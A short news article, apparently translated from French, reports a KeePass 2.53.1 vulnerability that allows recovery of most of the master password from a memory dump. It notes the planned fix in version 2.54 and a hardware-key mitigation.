The KeePass manager is affected by a vulnerability that allows the attacker to recover the master password of exposed victims.
If even password managers suffer serious security breaches, but where is the world going? After the (many) setbacks of LastPass, this time it is its competitor KeePass, in theory supposed to encrypt its entire database, which is overdue. The almost 20-year-old open source and free password manager is hit by a critical flaw, discovered by a researcher on GitHub.
An exploitable flaw on Windows, macOS and Linux
The flaw in question makes it possible to recover the master password, which is oh so crucial for all users of the tool, because it is with this single protective identifier that one can access the entire database including so, passwords, usernames, URLs and such.
Understand that this encrypted database can only be unlocked with the master password. Better to avoid it falling into the wrong hands, because as much to say that the hacker would have access to a real treasure chest.
The vulnerability allows recovery of the plaintext master password from a memory dump (or RAM dump), even when the workspace is locked, or no longer working, explain the Malwarebytes specialists, who offer a new reading of the flaw, which can also be used on Windows, macOS and Linux.
A vulnerability that will only be corrected this summer
Only the first character of a user’s password cannot be recovered. Beyond the certain criticality of the fault, it is not urgent to panic, according to the specialists. If you have a KeePass account, you risk nothing, a priori, because the attacker must first have compromised your device. And if cyber researchers call for caution, they also point out that there are different ways to guard against this vulnerability.
One of them is the use of a physical key, a Yubikey for example, which will allow you to keep the master password outside the text box. It will not end up in system memory.
The latest available version of KeePass (2.53.1) is unfortunately also vulnerable. The flaw will be fixed in version 2.54, which KeePass should deploy this summer, probably sometime in July. It will be necessary to be patient, the developers of the application explaining that they are working on other security-related features.
Source : GitHub, Malwarebytes Labs
14